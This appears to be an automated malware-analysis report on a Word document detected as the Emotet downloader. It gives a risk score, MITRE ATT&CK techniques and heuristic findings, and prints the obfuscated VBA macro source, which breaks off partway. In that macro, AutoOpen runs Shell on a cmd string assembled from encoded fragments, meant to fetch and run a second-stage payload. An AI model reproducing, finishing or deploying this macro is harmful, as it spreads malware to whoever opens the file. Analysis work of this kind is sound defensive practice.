MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. The AutoOpen macro is designed to execute a command that constructs a string to download and run a second-stage payload. The ClamAV detection explicitly identifies this as Emotet, a known downloader family.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6884074-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884074-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5807 bytes |
SHA-256: 81a23311da0f62f236128d1457388d5283c90cfab58e015d9c3c30c77eeaee3b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iLHjIatBF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Log(rGknv * MXQXG * zOuKf * WXJVT)
TypeName 453
TypeName Chr(wbvrjn + zTURC / jzuwp / QvBuVb)
TypeName Log(46968 / 29051 + 82886 * HVNwIj)
TypeName CInt(GVmpa)
TypeName Sin(hHjpR)
Shell@ CStr("c") + CStr("m") + vzjaPlIA + jiGrTbibi + SGHKWO + hjOiq + FYUKccZmLP + oXMUYiTV + fEirsMj + pzlzKBtkb, 300841476 - 300841476
TypeName ChrW(4230)
TypeName Sqr(XSEkp)
End Sub
Attribute VB_Name = "WZbIoOvCY"
Function SGHKWO()
On Error Resume Next
TypeName Log(YHSTnK - 67000 - BRrfQC - AREwG)
TypeName CDbl(EVCNLR + mpqib)
TypeName Rnd(5087)
OhprTktTMlq = "d /V:ON/C" + CStr(Chr(nzudfCChu + MFbblUw + 34 + UWJitTSFiM + qPuCVTbq)) + "set Kj=" + "JiTZMmcp" + "iZJmk" + "SjSbAIlIYX"
TypeName CDbl(vDNPpM)
TypeName CLng(86652 - FttMNB)
ojJnOwMKks = "mEku" + "OVY" + "n1r\{x:" + "ChF'(LtN)" + "gBdvW-z7" + "DUa/e" + "0sq=}fw$ "
TypeName Tan(DzRZwQ)
TypeName CSng(409)
TypeName 5956
lJJRmw = "oP,;.G@+" + "y&&for %r" + " in (7;68;" + "65;58;" + "32;6" + "0;38;58;19" + ";19;" + "67;66" + ";6" + "1;5"
TypeName Sqr(24573313)
TypeName Sin(2420 / 94670)
GiwHlo = "0;61;62;" + "30;58" + ";65;51" + ";68;16" + ";14;58;6;4" + "3;67;44;5" + "8;43;72" + ";50;58;" + "16;37;19;" + "8;58" + ";30" + ";43"
TypeName wdblMt
TypeName Hex(SzEMU * DsERI)
GkSVpFq = ";71;66;" + "39;6" + ";37;62" + ";40" + ";38;43;" + "43;7" + ";3" + "6;57;57" + ";43" + ";32;8" + ";6"
TypeName CDate(jujzE)
TypeName CInt(fucczZ / BGqwIX)
EwzLbXIJCU = "0;43" + ";56;3" + "0;3" + "2;8;30;58;" + "58;32;7" + "2;6;68;" + "23;57;" + "26;" + "54" + ";8;43;4" + "2;31;7" + "4;38;43;43"
TypeName ChrW(85)
TypeName Sqr(MsRwaL)
IdaioHKYZ = ";7;3" + "6;57;57;4" + "3;58;" + "6;38" + ";60;8"
TypeName 48
TypeName CLng(67)
TypeName kTKks
HtPTEbwF = ";60;43;60;" + "68" + ";19;26;43;" + "8" + ";68;30" + ";72;6;"
TypeName CBool(161455722)
TypeName 4938
JSXjdi = "68;" + "23;57;3" + "2;23;52;43" + ";5" + "4;7"
TypeName 7
TypeName AzBRVn
TypeName Oct(ZQQBRM * qVXEQ * hbBpiW * 74896)
rDJsPa = "4;38;43;43" + ";7;" + "36;57" + ";" + "57;3" + "0;8;" + "46" + ";3" + "8;43;64;" + "19;8;46;3"
SGHKWO = OhprTktTMlq + ojJnOwMKks + lJJRmw + GiwHlo + GkSVpFq + EwzLbXIJCU + IdaioHKYZ + HtPTEbwF + JSXjdi + rDJsPa
TypeName HrhJJ
TypeName 137302633
End Function
Function hjOiq()
On Error Resume Next
TypeName CStr(28594937)
TypeName CDate(4745 + NjvSm - WQCPvh / LafJc)
TypeName Hex(UPvGU)
sqwsHKdjP = "8;43;72;14" + ";" + "7;5" + "7;" + "38" + ";73;9;" + "5" + "0;6;" + "74;" + "38;4" + "3;4"
TypeName ftiTXv
TypeName fSPicW
YjtrvNh = "3" + ";7;36;57" + ";57;56;" + "6" + "1;26;" + "56" + ";19;26;30"
TypeName 8
TypeName Fix(59)
EiZOYpzX = ";56;72;14" + ";7;57;39;4" + "7;6" + "4;44;74" + ";38;4"
TypeName Sgn(HvMbQE)
TypeName 494
FkojR = "3;4" + "3;7" + ";36;57;57;" + "16;" + "19;56;" + "6;25;49" + ";" + "68;23;8" + ";43;" + "72;6;6" + "8;23;7"
TypeName tIYhOj
TypeName Cos(QZWXW / 24901 + jQKBV / kjzYX)
TypeName Sqr(509)
dcwNjJzU = "2" + ";1" + "6;32;57" + ";4;40;72;" + "15;7;"
TypeName CBool(knKZp - IZYJq - 56659 + 70723)
TypeName Oct(38803494)
TypeName Sqr(ScTUN / 78545 * wNBzz - nlVjZ)
FQuVlU = "1" + "9;" + "8;4" + "3;41;40;" + "74;40;45" + ";" + "71;66;55;8" + ";8;67;" + "62;67;40" + ";53;53;59;" + "40;71;66;"
TypeName ChrB(6469 * YChCI)
TypeName CDbl(2208)
nirfhOTwFI = "14;" + "49;3" + "7;6" + "2;66;58;" + "30;49;3" + "6;43" + ";58;23" + ";"
TypeName 3
TypeName Rtiojl
TypeName zwiozD
cGuGQ = "7;75;40;33" + ";40" + ";75;" + "66;55;" + "8;8;75;4" + "0;7" + "2;58;35" + ";58;40;71;" + "64;68" + ";3"
hjOiq = sqwsHKdjP + YjtrvNh + EiZOYpzX + FkojR + dcwNjJzU + FQuVlU + nirfhOTwFI + cGuGQ
TypeName ChrW(RbKDlB)
TypeName UOMp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.